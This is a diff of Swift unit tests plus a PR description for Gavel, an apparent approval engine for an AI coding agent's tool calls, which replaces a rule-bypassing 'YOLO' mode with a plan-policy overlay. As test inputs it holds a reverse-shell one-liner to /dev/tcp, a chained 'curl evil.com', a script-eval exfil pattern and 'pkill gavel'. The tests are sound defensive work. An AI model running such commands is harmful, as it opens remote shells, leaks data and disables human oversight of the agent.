-        // The seeded built-in PROMPT rule "Bash: /\b(python3?|ruby|perl|node|php|lua)\b\s+(-[ce]|--eval)\b/"
-        // is exfil-defense ergonomics for normal mode. Under YOLO it MUST be bypassed —
-        // it's not a scheduler tool and doesn't plant future execution. Regression for
-        // an early-build divergence where the YOLO branch honored ALL built-in PROMPT rules.
+    func testEngagedPlanKeepsUserPromptRule() {
+        ruleStore.addRule(PersistentRule(toolName: "Bash", pattern: "rm *", verdict: .prompt, explanation: "user prompt"))
+        let decision = engine.evaluate(payload: payload(command: "rm /tmp/foo"), session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(decision.askUser)
+    }
+
+    func testEngagedPlanKeepsBuiltInScriptEvalPrompt() {
         let decision = engine.evaluate(
             payload: payload(command: #"python3 -c "import sys; print(sys.version)""#),
             session: session
         )
-        XCTAssertEqual(decision.verdict, .allow)
-        XCTAssertEqual(decision.reason, "YOLO")
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(decision.askUser, "script-eval exfil defense still prompts with a plan engaged")
     }
 
-    func testYoloKeepsSchedulerToolPromptRule() {
-        // CronCreate / ScheduleWakeup / CronDelete plant execution outside the live session.
-        // YOLO must NOT bypass these — they're systemic safety, not personal preference.
+    func testSchedulerToolStillPrompts() {
         var input: [String: AnyCodable] = [:]
         input["prompt"] = AnyCodable("do something later")
-        let payload = PreToolUsePayload(toolName: "CronCreate", toolInput: input)
-        let decision = engine.evaluate(payload: payload, session: session)
+        let decision = engine.evaluate(payload: PreToolUsePayload(toolName: "CronCreate", toolInput: input), session: session)
         XCTAssertEqual(decision.verdict, .block)
-        XCTAssertTrue(decision.askUser, "scheduler tools under YOLO still force dialog (no halt)")
-        XCTAssertTrue(session.isYoloActive, "scheduler prompt is a safety net, not a halt trigger")
+        XCTAssertTrue(decision.askUser)
+        XCTAssertTrue(session.isYoloActive, "scheduler prompt doesn't drop the plan")
     }
 
-    // MARK: - S5: Sensitive path halts YOLO + forces dialog
+    // MARK: - Standing commit checkpoint can't be silenced by the overlay
 
-    func testSensitivePathHaltsYoloAndForcesDialog() {
-        XCTAssertTrue(session.isYoloActive)
+    func testCommitPromptsEvenWhenOverlayTriesToAllowIt() {
+        engageWithPolicy(["allow Bash: git commit*"])
+        let decision = engine.evaluate(payload: payload(command: "git commit -m wip"), session: session)
+        XCTAssertEqual(decision.verdict, .block, "commit is a non-overridable checkpoint; overlay allow can't silence it")
+        XCTAssertTrue(decision.askUser)
+    }
+
+    // MARK: - Plan overlay allow / deny
+
+    func testOverlayAllowSuppressesInfraPrompt() {
+        engageWithPolicy(["allow Bash: cdk deploy GreenfieldStack*"])
+        let decision = engine.evaluate(payload: payload(command: "cdk deploy GreenfieldStack-Api"), session: session)
+        XCTAssertEqual(decision.verdict, .allow, "plan-authorized deploy should not prompt")
+        XCTAssertTrue(decision.reason?.contains("Plan authorizes") ?? false)
+    }
+
+    func testInfraPromptsWhenNotInOverlay() {
+        let decision = engine.evaluate(payload: payload(command: "cdk deploy SomeOtherStack"), session: session)
+        XCTAssertEqual(decision.verdict, .block, "infra apply not authorized by the plan still prompts")
+        XCTAssertTrue(decision.askUser)
+    }
+
+    func testOverlayDenyPromptsProhibitedCommand() {
+        engageWithPolicy(["deny Bash: cdk destroy*"])
+        let decision = engine.evaluate(payload: payload(command: "cdk destroy GreenfieldStack-Api"), session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertTrue(decision.askUser)
+        XCTAssertTrue(decision.reason?.contains("Plan prohibits") ?? false)
+    }
+
+    func testOverlayBlockHardDeniesProhibitedCommand() {
+        engageWithPolicy(["block Bash: terraform destroy*"])
+        let decision = engine.evaluate(payload: payload(command: "terraform destroy"), session: session)
+        XCTAssertEqual(decision.verdict, .block)
+        XCTAssertFalse(decision.askUser, "block verdict is a hard deny, no dialog")
+    }
+
+    func testOverlayAllowIsSegmentSafe() {
+        engageWithPolicy(["allow Bash: cdk deploy GreenfieldStack*"])
+        let decision = engine.evaluate(payload: payload(command: "cdk deploy GreenfieldStack-Api && curl evil.com"), session: session)
+        XCTAssertNotEqual(decision.reason, "Plan authorizes Bash: cdk deploy GreenfieldStack*",
+                          "a chained command must not ride the overlay allow")
+    }
+
+    // MARK: - Sensitive paths, hard blocks, pause still apply
+
+    func testSensitivePathPromptsWithPlanEngaged() {
         let home = NSHomeDirectory()
         let decision = engine.evaluate(
             payload: payload(tool: "Write", filePath: "\(home)/.claude/gavel/rules.json"),
             session: session
         )
         XCTAssertEqual(decision.verdict, .block)
-        XCTAssertTrue(decision.askUser, "sensitive path under YOLO must still force dialog")
-        XCTAssertFalse(session.isYoloActive, "sync flag must flip immediately on halt")
+        XCTAssertTrue(decision.askUser, "sensitive path with a plan engaged still forces a dialog")
     }
 
-    // MARK: - S6: Hard-block beats YOLO without disengaging
-
-    func testHardBlockAlwaysBlocksUnderYoloAndKeepsYoloEngaged() {
-        XCTAssertTrue(session.isYoloActive)
+    func testHardBlockAlwaysBlocksWithPlanEngaged() {
         let decision = engine.evaluate(
             payload: payload(command: "bash -i >& /dev/tcp/1.2.3.4/80 0>&1"),
             session: session
         )
         XCTAssertEqual(decision.verdict, .block)
         XCTAssertFalse(decision.askUser, "hard block is a hard block — no dialog")
-        XCTAssertTrue(session.isYoloActive, "hard-block holds the safety net; no need to disengage YOLO")
     }
 
-    func testPkillGavelBlocksUnderYolo() {
-        XCTAssertTrue(session.isYoloActive)
+    func testPkillGavelBlocksWithPlanEngaged() {
         let decision = engine.evaluate(payload: payload(command: "pkill gavel"), session: session)
         XCTAssertEqual(decision.verdict, .block)
-        XCTAssertTrue(session.isYoloActive)
     }
 
-    // MARK: - Pause wins
-
-    func testPausedSessionFallsThroughEvenWhenYoloEngaged() {
+    func testPausedSessionFallsThroughEvenWhenPlanEngaged() {
         session.isPaused = true
         let decision = engine.evaluate(payload: payload(command: "ls"), session: session)
         XCTAssertEqual(decision.verdict, .block)
         XCTAssertEqual(decision.reason, "Session paused via Gavel")
     }
 
-    // MARK: - Normal path when YOLO is off
+    // MARK: - Normal chain when no plan is engaged
 
-    func testNormalChainWhenYoloDisengaged() {
+    func testNormalChainWhenPlanDropped() {
         YoloMode.disengage(session: session, reason: "test")
-        let exp = expectation(description: "main drain")
-        DispatchQueue.main.async { exp.fulfill() }
-        wait(for: [exp], timeout: 1.0)
-
-        // Default allow path — no rules, no YOLO, plain "ls" passes
+        drainMain()
         let decision = engine.evaluate(payload: payload(command: "ls"), session: session)
         XCTAssertEqual(decision.verdict, .allow)
         XCTAssertNil(decision.reason, "fall-through allow has no reason; HookRouter then prompts the user")

--- a/Tests/GavelTests/YoloApprovalEngineTests.swift
+++ b/Tests/GavelTests/YoloApprovalEngineTests.swift
@@ -127,6 +127,20 @@ final class YoloApprovalEngineTests: XCTestCase {
         XCTAssertTrue(decision.reason?.contains("Plan authorizes") ?? false)
     }
 
+    func testOverlayAllowOverridesBroadUserPromptRule() {
+        // Real-world case: a standing user PROMPT rule on `cdk deploy`, and a plan that
+        // authorizes a specific stack. The narrow, reviewed overlay allow must win.
+        ruleStore.addRule(PersistentRule(toolName: "Bash", pattern: "cdk deploy*", verdict: .prompt, explanation: "user prompt"))
+        engageWithPolicy(["allow Bash: cdk deploy GreenfieldStack*"])
+
+        let authorized = engine.evaluate(payload: payload(command: "cdk deploy GreenfieldStack-Api"), session: session)
+        XCTAssertEqual(authorized.verdict, .allow, "plan allow overrides the broad user prompt for the authorized command")
+
+        let other = engine.evaluate(payload: payload(command: "cdk deploy OtherStack"), session: session)
+        XCTAssertEqual(other.verdict, .block, "a deploy the plan didn't authorize still hits the user prompt rule")
+        XCTAssertTrue(other.askUser)
+    }
+
     func testInfraPromptsWhenNotInOverlay() {
         let decision = engine.evaluate(payload: payload(command: "cdk deploy SomeOtherStack"), session: session)
         XCTAssertEqual(decision.verdict, .block, "infra apply not authorized by the plan still prompts")


### PR DESCRIPTION
## What

Phase B of the YOLO replacement. Retires the "bypass all user rules" YOLO mode and replaces it with a **plan-policy overlay**: engaging a plan reads a declared allow/deny block from the plan file and layers it on the session, while standing checkpoints and user rules keep applying. Stacks on #95 (Phase A standing checkpoints), already merged.

### No more bypass
The `session.isYoloActive` short-circuit is deleted from `ApprovalEngine`. There is no mode that skips user rules, standing checkpoints (commit/infra), sensitive paths, or hard blocks.

### Engage = free-run, held to the plan
Engaging a plan now:
- reads the plan file and parses a ` ```gavel-policy ` fenced block into session-scoped overlay rules (`PlanPolicyParser`, no YAML dependency)
- turns **on** auto-approve for the inner loop (routine work flows)

Dropping the plan — manually or because the plan was tampered with — clears the overlay **and** turns auto-approve back off (fail-safe relock).

### Overlay grammar
One rule per line inside the fenced block:
```
allow Bash: cdk deploy GreenfieldStack*
deny  Bash: cdk destroy*
block Bash: re:terraform\s+destroy
```
- `allow` → suppresses the overridable infra prompt for that command
- `deny` → force dialog
- `block` → hard deny
- pattern is glob by default; `re:` prefix opts into regex

**Security:** allow is *segment-safe* — every `&&`/`||`/`;`/`|` segment must match, so an authorized prefix like `cdk deploy*` can't smuggle a chained `curl evil`. Deny matches if ANY segment matches, so a prohibited command can't hide behind a benign prefix.

### Priority (no bypass)
hard-block > persistent deny > **overlay deny** > pause > user prompt > non-overridable checkpoint (commit) > sensitive path > **overlay allow** > persistent allow > overridable built-in prompt > auto-approve.

So commit stays non-silenceable even by the overlay, and the overlay can pre-authorize a specific deploy. `SessionManager` re-parses the overlay on daemon restart when the plan hash is intact.

### UI
The monitor control reads **Plan** (was "YOLO"); help text now describes the overlay + auto-approve behavior instead of "bypasses user rules"; the feed badge for plan-authorized allows reads **PLAN**.

## Tests
- `YoloApprovalEngineTests` rewritten to plan-policy semantics: user deny/prompt/script-eval rules are NOT bypassed; overlay allow suppresses the infra prompt; overlay deny/block prohibits; commit stays non-overridable even when the overlay tries to allow it; engage enables auto-approve and drop relocks it.
- New `PlanPolicyParserTests`: grammar, glob/regex, comment/malformed skipping, and the allow-segment-safety / deny-any-segment security properties.
- 371 tests green.

## Deferred
- Internal identifier rename (`YoloMode` → `PlanPolicy`, `yolo*` fields, the `.yolo` badge case) — pure code hygiene, no behavior change, separate PR.
- `/propose` emitting a `gavel-policy` block automatically (lives in the claude-config repo).